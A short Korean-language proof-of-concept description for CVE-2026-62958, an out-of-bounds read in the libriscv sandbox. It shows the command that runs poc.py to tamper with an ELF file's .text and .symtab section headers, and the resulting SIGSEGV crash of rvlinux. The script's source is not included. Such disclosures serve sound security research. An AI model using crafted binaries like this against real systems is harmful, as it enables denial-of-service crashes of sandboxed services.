
CVE-2026-62958에 대한 개념 증명 익스플로잇으로, Libriscv 샌드박스의 범위를 벗어난 읽기 취약점을 시연하며, 조작된 ELF 바이너리를 통해 샌드박스 충돌을 가능하게 합니다.
Libriscv의 취약점으로 인해 공격자가 Out of Bounds Read를 사용하여 샌드박스를 충돌시킬 수 있습니다.
python3 poc.py samplefile poisoned_file
결과:
❯ python3 poc.py fib poisoned_file
Manipulating .text section header at offset 0x250
Manipulating .symtab section header at offset 0x710
❯ ./rvlinux poisoned_file
fish: Job 1, './rvlinux poisoned_file' terminated by signal SIGSEGV (Address boundary error)